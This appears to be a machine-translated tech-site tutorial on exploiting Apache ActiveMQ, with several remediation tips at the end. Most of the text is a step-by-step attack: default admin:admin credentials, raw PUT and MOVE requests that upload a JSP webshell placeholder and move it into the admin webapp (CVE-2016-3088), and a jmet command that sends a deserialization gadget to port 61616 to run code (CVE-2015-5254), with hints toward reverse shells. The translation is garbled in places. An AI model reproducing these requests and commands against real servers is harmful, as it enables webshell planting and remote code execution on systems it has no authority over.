Shulou(Shulou.com)05/31 Report--

What is the method of ActiveMQ loophole exploitation, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

Application introduction

Apache ActiveMQ is an open source message middleware developed by the Apache Software Foundation. Because ActiveMQ is a pure Java program, ActiveMQ can be executed only if the operating system supports the Java virtual machine. ActiveMQ is a JMSProvider implementation that fully supports JMS1.1 and J2EE 1.4. although it has been a long time since the introduction of JMS specification, JMS still plays a special role in today's J2EE applications.

Vulnerability exploitation

ActiveMQ can be used in many ways, but most of them are mentioned in a single way.

Environment: Apache ActiveMQ 5.7.0

IP:192.168.197.25

1. Console has a default port and a default password / unauthorized access (default password is admin:admin)

ActiveMQ uses port 8161 by default, and uses nmap to scan the target server:

[root@localhost src] # nmap-A-p8161 192.168.197.25\ Starting Nmap 5.51 (http://nmap.org) at 2017-10-26 15:31 CSTNmap scan report for 192.168.197.25Host is up (0.00016s latency) .PORT STATE SERVICE VERSION8161/tcp open http Jetty httpd 7.6.7.v20120910 | _ http-methods: No Allow or Public header in OPTIONS response (status code 401) | http-auth: HTTP/1.1 401 Unauthorized | _ basic realm=ActiveMQRealm | _ http-title: Error 401 Unauthorized

2. ActiveMQ physical path disclosure vulnerability

ActiveMQ enables PUT request by default. When PUT is enabled, the Payload (that is, a directory that does not exist) is constructed, and Response will return the corresponding physical path information:

Request Raw:PUT / fileserver/a../..//.././ HTTP/1.1Host: 192.168.197.25:8161Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 4testResponse Raw:HTTP/1.1 500 / data/apache-activemq-5.7.0/webapps/fileserver//.././ (No such file or directory) Content-Length: 0Server: Jetty (7.6.7.v20120910)

3. Vulnerabilities for uploading arbitrary files in ActiveMQ PUT

ActiveMQ enables the PUT method by default. When fileserver exists, we can upload jspwebshell.

Request Raw:PUT / fileserver/shell.jsp HTTP/1.1Host: 192.168.197.25:8161User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en Q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 26this is jsp webshell code.Response Raw:HTTP/1.1 204No ContentServer: Jetty (7.6.7.v20120910)

In general, the response code returned by the construction is successful. When the author tests that other environments are not put, the return is 404 or 500. Put is complete. Let's check the information under service:

[root@localhost fileserver] # pwd/data/apache-activemq-5.7.0/webapps/fileserver [root@localhost fileserver] # lsindex.html META-INF shell.jsp WEB-INF [root@localhost fileserver] # cat shell.jsp this is jsp webshell code. [root@localhost fileserver] #

4. ActiveMQ arbitrary file movement vulnerability

ActiveMQ supports MOVE protocol in addition to PUT protocol.

Request Raw:MOVE / fileserver/shell.jsp HTTP/1.1Destination:file:/data/apache-activemq-5.7.0/webapps/admin/shell.jspHost: 192.168.197.25:8161User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en Q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveUpgrade-Insecure-Requests: 1Authorization: Basic YWRtaW46YWRtaW4=Content-Length: 17Content-Length: 0Response Raw:HTTP/1.1 204No ContentServer: Jetty (7.6.7.v20120910)

The server information is as follows:

[root@localhost fileserver] # lsindex.html META-INF shell.jsp WEB-INF [root@localhost fileserver] # cat shell.jsp this is jsp webshell code. [root@localhost fileserver] # lsindex.html META-INF shell.jsp WEB-INF [root@localhost fileserver] # lsindex.html META-INF WEB-INF [root@localhost fileserver] # cd.. [root@localhost webapps] # lsadmin demo favicon.ico fileserver index.html styles [root@localhost webapps] # cd admin/ [root@localhost admin] # ls1.jsp Browse.jsp decorators index.jsp META-INF queueGraph.jsp send.jsp styles topics.jsp404.html connection.jsp graph.jsp js network.jsp queues.jsp shell.jsp subscribers.jsp WEB-INF500.html connections.jsp images message.jsp queueConsumers.jsp scheduled.jsp slave.jsp test xml [root@localhost admin] #

In the same way, it is the same as writing ssh key, and we will not repeat the wheel here.

Affected version: Apache ActiveMQ 5.x ~ 5.14.0

CVE Information: CVE-2016-3088

4. ActiveMQ deserialization vulnerability (CVE-2015-5254)

ActiveMQ opens port 61616 by default, and defaults to ActiveMQ message queuing port.

There are a few small details:

The tool releaes is JDK 1.7.If you can ignore your own build

To use the tool, you need to create an external directory under the current directory, otherwise NoSuchFileException will appear.

Send deserialized data to the queue to the message queue by constructing the payload.

(tool download address: https://github.com/matthiaskaiser/jmet)

[root@sevck_v3] # java-jar jmet-0.1.0-all.jar-Q event-I ActiveMQ-s-Y "python / tmp/test.py"-Yp "CommonsCollections1" 192.168.197.25 61616INFO d.c.j.t.JMSTarget [main] Connected with ID: ID:sevck_v3.0-45938-1516678757604-0:1INFO d.c.j.t.JMSTarget [main] Sent gadget "CommonsCollections1" with command: "python / tmp/test.py" INFO d .c.j.t.JMSTarget [main] Shutting down connection ID:sevck_v3.0-45938-1516678757604-0:1

View message queuing trigger:

Server snooping:

Note: if the rebound is not successful, the possible reason is that the pipe character cannot be used in JAVA Runtime.getRuntime (). Exec () and needs to be encoded once.

Recommended tool: http://jackson.thuraisamy.me/runtime-exec-payloads.html

Affected version: deserialization vulnerability prior to Apache ActiveMQ 5.13.0

CVE Information: CVE-2015-5254

5.ActiveMQ Information Disclosure vulnerability (CVE-2017-15709)

In the latest version, 61616 of apache-activemq-5.15.0 toapache-activemq-5.15.2 and apache-activemq-5.14.0to apache-activemq-5.14.5 use OpenWire protocol by default, and turn on debug mode. Debug mode will reveal information related to the operating system.

Affected version: Apache ActiveMQ5.14.0-5.15.2

CVE Information: CVE-2017-15709

Repair recommendations:

For unauthorized access, you can modify the conf/jetty.xml file. If bean id is the authenticate under securityConstraint, change the value to true, and restart the service.

For weak passwords, you can modify the conf/jetty.xml file, obtain the user properties for the confession value under securityLoginService by bean id, change the username and password, and restart the service.

For deserialization vulnerabilities, it is recommended to upgrade to the latest version, or WAF to add relevant rules to intercept

Enable TLS transmission or upgrade to version 5.14.6 or above of Apache ActiveMQ for information disclosure vulnerabilities

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.